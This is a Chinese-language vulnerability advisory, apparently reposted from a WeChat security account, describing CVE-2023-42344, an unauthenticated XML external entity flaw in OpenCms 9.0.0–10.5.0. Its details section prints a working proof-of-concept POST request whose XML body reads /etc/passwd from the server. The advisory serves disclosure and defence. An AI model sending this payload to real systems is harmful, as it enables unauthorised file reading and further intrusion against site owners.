0x00 前言
OpenCms 是一个专业级别的开源网站内容管理系统。OpenCms 可以非常容易的帮助建立和管理复杂的网站而无需专业的 HTML 知识。
OpenCms基于JAVA和XML语言技术,因此它适合完全融入到现有的系统内部。OpenCms可以非常好的运行在一个完全的开源环境中(例如:Linux、Apache、Tomcat、MySQL)。
0x01 漏洞描述
由于服务端接收和解析了来自用户端的 XML 数据,且未对引用的外部实体进行适当处理,导致容易受到XML外部实体注入(XXE)攻击。 未经身份验证的远程威胁者可向服务端发送带有XXE Payload的恶意 HTTP POST 请求,成功利用可能导致任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。
0x02 CVE编号
CVE-2023-42344
0x03 影响版本
OpenCMS 9.0.0 - 10.5.0
0x04 漏洞详情
POST
/opencms/cmisatom/cmis-online/query
HTTP/1.1
Content-Type
: application/cmisquery+xml
Host
: host
Content-Length
: 524
Connection
: close
<?xml version=
'1.0'
encoding=
'UTF-8'
?><!DOCTYPE root [<!ENTITY test SYSTEM
'file:///etc/passwd'
>]><
cmis:
query
xmlns:
cmis=
"<http://docs.oasis-open.org/ns/cmis/core/200908/>"
><
cmis:
statement>&test;<
/cmis:statement><cmis:searchAllVersions>false</cmis
:searchAllVersions><cmis
:includeAllowableActions>false</cmis
:includeAllowableActions><cmis
:includeRelationships>none</cmis
:includeRelationships><cmis
:renditionFilter>cmis
:none</cmis
:renditionFilter><cmis
:maxItems>
100
<
/cmis:maxItems><cmis:skipCount>0</cmis
:skipCount></cmis
:query>
0x05 参考链接
https:
//blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
原文始发于微信公众号(信安百科):CVE-2023-42344|OpenCMS XXE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论